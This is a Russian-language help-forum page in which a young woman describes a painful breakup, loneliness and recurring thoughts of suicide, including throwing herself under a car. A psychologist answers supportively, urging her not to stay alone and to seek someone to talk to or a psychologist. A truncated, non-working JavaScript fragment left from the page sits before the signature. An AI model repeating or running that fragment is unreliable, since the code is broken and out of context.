Мысли о том, что я не хочу жить

Айдай 22.10.2015

С виду я уверенная в себе,веселая и общительная.Под коркой сильной девушки сидит ребенок которому не додали любви в детстве,по этой причине мучаюсь сейчас будучи взрослой.Любила человека,мы были счастливы 1,5 года,но потом он мне изменил и буквально за неделю я узнала совершенно другого человека,он добил меня поступками,словами и еще пнул меня.ОН был единственным близким человеком для меня,я здесь совершенно одна,и я не справляюсь,я отвлекаю себя,читаю,рисую,много работаю.На рабочем фронте все отлично,я живу вроде бы счастливая,но мне хочется умереть быстро...Я настолько полюбила его,а он так поступил....увидев меня никто так не подумает,все думают,что я счастливая и мне все хватает....а я несчастна,я не хочу жить,мысли бросится под машину,исчезнуть не покидают меня...помогите мне,я одна уже не справлюсь

Здравствуйте, Айдай.

Прежде всего нужно понять, что чувство боли которое вы испытываете - это то что вы и должны испытывать в данной ситуации. Вас  обманул и предал человек, которого вы любили и  которому доверяли. Предательство ранит очень сильно - это рана, для того чтобы она зажила и перестала - болеть  естественно нужно время. И как, бы банально это не звучало, но что правда, то правда - время лечит!

Внушает надежду, то. что вы не ушли головой в свою депрессию и сохраняете социальную активность. Значительно облегчить ваше состояние  и может помочь поддержка близких. Попробуйте поделится с кем-нибудь, тем что происходит у вас в душе. Вы сильная девушка, вы прячете свою боль за тем, что позиционируете себя уверенным,   независимым человеком, но в данной ситуации совершенно необходимо НЕ БЫТЬ ОДНОЙ -  вам нужна поддержка! Если сейчас нет человека рядом, кто мог бы вам ее оказать обратитесь за помощью к психологу, но ни в коем случае не оставайтесь с тем, что чувствуете один на один.

// t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e

Маташкова Оксана Валерьевна, психолог Алматы